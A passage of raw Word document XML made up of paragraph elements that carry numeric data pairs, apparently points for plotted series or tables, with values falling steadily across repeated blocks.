    <w:p w14:paraId="05555AD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4), 224.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368BB0A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5), 230.20},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2804740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6), 234.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE4BC7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8), 238.90},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1FCFD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12), 243.90},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7643E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16), 246.50},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A18B17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24), 249.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305DF2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50), 251.80},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3BA637"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1, 51), 254.30},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6444DA" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77B233D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1), 18.51},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7C88D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2), 19.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669B6F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3), 19.16},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7413A2A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4), 19.25},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3053DB7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5), 19.30},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C17A61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6), 19.33},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524AD6B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8), 19.37},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1BB34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12), 19.41},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB85B6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16), 19.43},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5496ED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24), 19.45},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2465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50), 19.47},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38656E4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51), 19.50},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2643CE0B" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12443D5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1), 10.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF1CEB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2), 9.55},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D93ADA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3), 9.28},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2579A67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4), 9.12},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F462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5), 9.01},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287FFD9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6), 8.94},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513041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8), 8.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434EB04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12), 8.74},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCE9F7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16), 8.69},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC9619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24), 8.64},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B2B0C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50), 8.58},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F33CB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51), 8.53},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51111E32" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C0441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1), 7.71},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2300539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2), 6.94},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9279C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3), 6.59},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34579A0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4), 6.39},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBD796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5), 6.26},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E743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6), 6.16},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0FB2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8), 6.04},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4D494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12), 5.91},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160050A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16), 5.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2523E5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24), 5.77},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2ED5B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50), 5.70},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CAC73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51), 5.63},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564895AA" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39A2860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1), 6.61},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFDA51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2), 5.79},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB46E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3), 5.41},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280109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4), 5.19},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE3139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5), 5.05},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047327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6), 4.95},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CC9F2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8), 4.82},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5503580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12), 4.68},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C55578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16), 4.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710C362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24), 4.53},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C865B18"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5, 50), 4.44},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49619B5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51), 4.36},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4090F035" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="135C036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1), 5.99},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFBAB0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2), 5.14},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DD549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3), 4.76},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1602A99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4), 4.53},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F30573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5), 4.39},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C900C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6), 4.28},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D495EC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8), 4.15},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C708C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12), 4.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A8DB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16), 3.92},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3106924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24), 3.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6425CEE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50), 3.75},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1980825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51), 3.67},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72140895" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059A2DF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1), 5.59},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E173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2), 4.74},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121721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3), 4.35},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6C143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4), 4.12},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79508C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5), 3.97},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2228E50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6), 3.87},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E721E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8), 3.73},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0B4A2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12), 3.57},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F292B8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16), 3.49},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79771CE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24), 3.41},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699C9B5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50), 3.32},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380129B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51), 3.23},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA9E650" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53F5519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1), 5.32},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054724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2), 4.48},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1561997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3), 4.07},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C48D7C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4), 3.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718B931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5), 3.69},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1296950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6), 3.58},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DEEAF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8), 3.44},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E8773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12), 3.28},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483189D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16), 3.20},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F82AED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24), 3.12},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43793F0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50), 3.02},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D72A9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51), 2.93},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EC167F" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4627E65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1), 5.12},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BCA08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2), 4.26},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766622D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3), 3.86},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47548CB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4), 3.63},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A7423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5), 3.48},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A4FE5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6), 3.37},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBF3EA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8), 3.23},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD46D9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12), 3.07},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737CB4D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16), 2.98},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12324911"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9, 24), 2.90},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E29C40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50), 2.80},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13530D6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51), 2.71},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7434EFDE" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE3093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1), 4.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E651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2), 4.10},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C1905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3), 3.71},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CBEB7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4), 3.48},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411530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5), 3.33},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F0FED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6), 3.22},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6DBED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8), 3.07},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693E5F0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12), 2.91},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D02FC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16), 2.82},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C529B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24), 2.74},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DE8EE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50), 2.64},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301CEE9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51), 2.54},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F9D305" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B21618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1), 4.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA825E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2), 3.98},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC3EED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3), 3.59},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAF27D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4), 3.36},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C984C9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5), 3.20},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BFA6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6), 3.09},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3865841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8), 2.95},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2989D69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12), 2.79},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F9AC4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16), 2.70},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305308B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24), 2.61},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8153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50), 2.50},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E4B1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51), 2.40},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A43A4AC" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601122D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1), 4.75},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7363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2), 3.88},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CE888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3), 3.49},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5819F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4), 3.26},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE966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5), 3.11},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0D74A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6), 3.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5540B07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8), 2.85},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBD920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12), 2.69},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C96F79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16), 2.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A65EA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24), 2.50},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57895E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50), 2.40},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C075C5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51), 2.30},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516DEBA4" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00F5C6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1), 4.67},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC7210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2), 3.80},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A8AB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3), 3.41},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B97CC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4), 3.18},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F5C6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5), 3.02},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC34FC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6), 2.92},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD9616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8), 2.77},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7AE63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12), 2.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDF9DFB"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13, 16), 2.51},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BC8EA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24), 2.42},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B8BEA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50), 2.32},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0176285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51), 2.21},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF66321" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0345B4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1), 4.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2428350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2), 3.74},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3586DA7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3), 3.34},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1178180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4), 3.11},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473EB26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5), 2.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4E64B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6), 2.85},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197BB2A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8), 2.70},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398089A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12), 2.53},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132DAA3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16), 2.44},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E855C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24), 2.35},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412E890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50), 2.24},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314CC3E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51), 2.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6904BC13" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B01D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1), 4.54},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00671B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2), 3.68},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9D6D3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3), 3.29},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487418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4), 3.06},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DAB57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5), 2.90},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6970A9C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6), 2.79},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222D90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8), 2.64},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491254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12), 2.48},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4CB8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16), 2.39},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3ED58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24), 2.29},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E922B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50), 2.18},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A090F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51), 2.07},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E50BAC" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07FDA01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1), 4.49},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F2C38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2), 3.63},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27440EF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3), 3.24},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FE523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4), 3.01},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA6302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5), 2.85},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359205F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6), 2.74},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFC68C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8), 2.59},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174C075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12), 2.42},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC249C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16), 2.33},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A963C5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24), 2.24},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209529D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50), 2.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157340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51), 2.01},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0184F455" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="649E1F4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1), 4.45},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212365D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2), 3.59},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660726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3), 3.20},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B69433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4), 2.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5043A72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5), 2.81},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6FB89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6), 2.70},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0A432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8), 2.55},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BE8954"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17, 12), 2.38},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A73FC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16), 2.29},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624643C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24), 2.19},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA21F2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50), 2.08},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3290EA9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51), 1.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C836B47" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B7823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1), 4.41},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C83A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2), 3.55},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6224670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3), 3.16},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29924A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4), 2.93},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3EC06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5), 2.77},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E67B96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6), 2.66},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3FC49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8), 2.51},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25657C1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12), 2.34},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41576B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16), 2.25},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C8EC6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24), 2.15},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24233C3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50), 2.04},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C9ADF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51), 1.92},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3222FDF3" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03750F7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1), 4.38},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDE5CC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2), 3.52},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399A52B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3), 3.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70647CE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4), 2.90},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A18101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5), 2.74},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682D42E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6), 2.63},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6C72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8), 2.48},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A800F3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12), 2.31},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD44C8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16), 2.21},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7489B76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24), 2.11},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624EDA9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50), 2.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0625A9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51), 1.88},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDEC63F" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="166855F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1), 4.35},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB616E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2), 3.49},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53989A2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3), 3.10},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205E403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4), 2.87},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD1DEA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5), 3.71},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4057D6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6), 2.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BCB1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8), 2.45},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F46AD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12), 2.28},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB323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16), 2.18},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F64DEB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24), 2.08},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC081F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50), 1.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2347EEF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51), 1.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A7B07C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="512A395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1), 4.32},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE6DCE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2), 3.47},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B668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3), 3.07},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE278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4), 2.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D339F2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5), 2.68},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106D912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6), 2.57},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56676EC5"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21, 8), 2.42},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59116C5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12), 2.25},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C75E0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16), 2.15},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2140F61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24), 2.05},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542D04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50), 1.93},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E194F8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51), 1.81},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0C5FA9" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51BE8EA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1), 4.30},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1673F96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2), 3.44},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A33E8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3), 3.05},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347D31E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4), 2.82},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F16E5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5), 2.66},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6624167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6), 2.55},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117EB8E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8), 2.40},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458888C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12), 2.23},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F414B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16), 2.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCC2CF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24), 2.03},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E6C4B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50), 1.91},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A14B1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51), 1.78},</w:t>
